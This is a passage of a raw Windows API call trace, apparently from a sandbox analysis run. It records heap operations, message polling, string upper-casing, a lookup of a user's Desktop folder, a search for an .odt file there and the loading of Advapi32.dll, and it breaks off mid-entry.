[0164.727] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0164.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0164.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0164.727] CharUpperBuffW (in: lpsz="A0F00600E09", cchLength=0xb | out: lpsz="A0F00600E09") returned 0xb [0164.727] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0164.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0164.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0164.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa9b0 [0164.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0164.728] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8bf3b0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x0 [0164.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0164.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0164.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0164.728] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0164.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0164.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0164.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9bd0 [0164.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0164.728] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8bf3b0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x0 [0164.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0164.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0164.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0164.728] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0164.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0164.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0164.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0164.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0164.729] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0164.729] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0164.729] CharUpperBuffW (in: lpsz="SSA0F00600E09", cchLength=0xd | out: lpsz="SSA0F00600E09") returned 0xd [0164.729] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0164.729] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0164.729] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0164.729] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0164.729] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0164.729] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0164.729] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0164.729] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0164.729] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0164.729] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0164.729] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0164.729] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0164.729] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0164.729] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop/GhiVvZ14WbSoIVTo6M.odt", lpFindFileData=0x8bf178 | out: lpFindFileData=0x8bf178*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x58359620, ftCreationTime.dwHighDateTime=0x1d4c93a, ftLastAccessTime.dwLowDateTime=0xd6659fc0, ftLastAccessTime.dwHighDateTime=0x1d4cda1, ftLastWriteTime.dwLowDateTime=0xd6659fc0, ftLastWriteTime.dwHighDateTime=0x1d4cda1, nFileSizeHigh=0x0, nFileSizeLow=0xc4e7, dwReserved0=0xca10006, dwReserved1=0xe1b8, cFileName="GhiVvZ14WbSoIVTo6M.odt", cAlternateFileName="GHIVVZ~1.ODT")) returned 0xaa5660 [0164.729] FindClose (in: hFindFile=0xaa5660 | out: hFindFile=0xaa5660) returned 1 [0164.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0164.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0164.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0164.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0164.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0164.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0164.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0164.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0164.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0164.730] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0164.730] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0164.730] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0164.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0164.730] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0164.730] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0164.730] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0164.730] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0164.730] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b78 [0164.730] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0164.730] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0164.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0164.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0164.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0164.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0164.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0164.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0164.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0164.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0164.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0164.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0164.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0164.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0164.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0164.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0164.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0164.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0164.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0164.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0164.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0164.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0164.731] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0164.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0164.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0164.731] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0164.732] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0164.732] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0164.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9420 [0164.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0164.732] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0164.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0164.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0164.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0164.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0164.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0164.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0164.732] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0164.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0164.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0164.732] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0164.732] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0164.732] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0164.732] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0164.732] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0164.732] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0164.732] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0164.732] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0164.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0164.733] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0164.733] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0164.733] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0164.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0164.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0164.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0164.733] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0164.733] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0164.733] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0164.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a96d8 [0164.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0164.733] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0164.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0164.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0164.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0164.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0164.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0164.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0164.733] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0164.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0164.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0164.733] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0164.734] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0164.734] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0164.734] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0164.734] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0164.734] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0164.734] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0164.734] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0164.734] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0164.734] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0164.734] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0164.734] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0164.734] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0164.734] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0164.734] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0164.734] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0164.734] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0164.734] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0164.734] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0164.734] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0164.734] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0164.734] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0164.734] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0164.735] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0164.735] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0164.735] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0164.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0164.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0164.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0164.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0164.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0164.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0164.735] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0164.735] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0164.735] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0164.735] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0164.735] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0164.735] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0164.735] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0164.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0164.735] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0164.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0164.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0164.736] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0164.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0164.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0164.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0164.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0164.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0164.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0164.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0164.736] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0164.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0164.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0164.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0164.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0164.736] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0164.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0164.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0164.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0164.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0164.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0164.737] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74d40000 [0164.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0164.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0164.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0164.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0164.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0164.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0164.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0164.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0164.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0164.737] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0164.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0164.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0164.737] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0164.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0164.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0164.737] CharUpperBuffW (in: lpsz="A5500B04258", cchLength=0xb | out: lpsz="A5500B04258") returned 0xb [0164.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0164.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0164.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0164.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1708 [0164.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0164.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0164.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0164.738] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0164.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa740 [0164.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0164.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0164.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0164.738] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0164.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0164.738] RtlAllocateHeap 